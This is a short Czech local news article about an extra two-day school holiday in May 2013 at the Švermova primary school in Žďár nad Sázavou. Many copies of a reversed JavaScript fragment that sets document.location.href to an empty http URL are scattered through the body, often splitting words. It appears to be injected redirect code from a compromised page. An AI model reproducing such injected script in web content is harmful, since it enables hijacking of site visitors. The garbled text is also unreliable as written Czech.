Žďár nad Sázavou, zdar nad sazavou, aktuality, škola, Švermova, volno
Rainbow page separator

Školáci ze 4. základní školy budou mít více volna

Středa, 27. února 2013

Žďár nad Sázavou / Školáci ze žďárské Základní školy Švermova budou mít v květnu oproti žákům z ostatních škol více dnů bez vyučování – čeká je mimořádné ředitelské volno.

Vedení vzdělávacího zařízení požádalo radu města o schválení vyhlášení ředitelského volna, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ve dnech 9. a 10. května. Důvodem pro vyhlášení mimořádného volna jsou nutné technické úpravy, které se uskuteční v budově školy. Ve středu 8. května je státní svátek, mimořádně volné dny tak děti budou mít i ve čtvrtek a v pátek.

Podle vedení města je [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to vhodný termín. „Vzhledem k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu, že státní svátek le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos vychází na středu, dá se předpokládat, že řada rodičů si bude chtít prodloužit víkend. Vezmou si ve čtvrtek i v pátek dovolenou a své po[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomky budou chtít omluvit z vyučování,“ informoval mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Žďáru nad Sázavou Ladislav Bárta.